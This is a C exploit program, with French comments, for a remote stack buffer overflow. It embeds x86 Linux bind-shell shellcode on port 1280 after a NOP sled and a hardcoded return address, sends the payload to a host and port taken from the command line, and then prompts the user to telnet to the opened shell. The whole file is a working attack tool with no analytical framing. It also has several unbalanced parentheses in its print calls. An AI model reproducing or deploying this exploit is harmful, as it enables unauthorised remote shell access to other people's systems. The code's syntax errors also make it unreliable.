#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#define OFFSET 522 /* buffer + %ebp + %eip = 514 + 4 + 4 = 522 */

/* shellcode - bind a shell on port 1280 + bits to cram (nop) + RET
\xe0\xf9\xff\xbf */

char shellcode_ret[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\xb1\x06\x51\xb1\x01"
"\x51\xb1\x02\x51\x8d\x0c\x24\xcd\x80\xb3\x02\xb1\x02\x31\xc9\x51\x51\x51"
"\x80\xc1\x05\x66\x51\xb1\x02\x66\x51\x8d\x0c\x24\xb2\x10\x52\x51\x50\x8d"
"\x0c\x24\x89\xc2\x31\xc0\xb0\x66\xcd\x80\xb3\x01\x53\x52\x8d\x0c\x24\x31"
"\xc0\xb0\x66\x80\xc3\x03\xcd\x80\x31\xc0\x50\x50\x52\x8d\x0c\x24\xb3\x05"
"\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0"
"\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80\xeb\x18\x5e\x89\x75\x08\x31\xc0"
"\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80"
"\xe8\xe3\xff\xff\xff/bin/sh\x90\x90\x90\x90\xe0\xf9\xff\xbf";

int main(int argc, char *argv[]) {
char buffer[OFFSET]; /* buffer a remplir */
int s, i, size;
struct sockaddr_in yeah;
struct hostent *host;

if(argc != 3) {
puts("[~] Remote buffer overflow";
printf("[~] Usage: %s host port\n", argv[0]);
return -1;
}

for(i=0;i<(OFFSET-sizeof(shellcode_ret));i++) buffer[i] = 0x90; /* on place les
NOPs dans buffer */

memcpy(buffer+OFFSET-sizeof(shellcode_ret) , shellcode_ret,
sizeof(shellcode_ret)); /* on copie le
shellcode dans le buffer */

host=gethostbyname(argv[1]); /* on test l'host */

if (host==NULL)
{
fprintf(stderr, "[!] Gethostbyname failled\n";
return -1;
}

s = socket(AF_INET, SOCK_STREAM, 0); /* on cre la socket */

if (s < 0)
{
fprintf(stderr, "[!] Erreur lors de la cration de la socket\n";
return -1;
}

/* informations pour la connexion */
yeah.sin_family = AF_INET;
yeah.sin_addr = *((struct in_addr *)host->h_addr);
yeah.sin_port = htons(atoi(argv[2]));

if (connect(s, (struct sockaddr *)&yeah, sizeof(yeah))==-1) /* on se connect */
{
close(s);
fprintf(stderr, "[!] Erreur lors de la tentative de connexion\n";
return -1;
}

size = send(s, buffer, sizeof(buffer), 0); /* on envoi le buffer  */
if (size==-1)
{
close(s);
fprintf(stderr, "[!] Foo! Exploit failled \n";
return -1;
}else{
fprintf(stdout, "[!] Exploit success! telnet %s 1280 !\n",argv[1]);
}
close(s); /* on ferme la socket */
}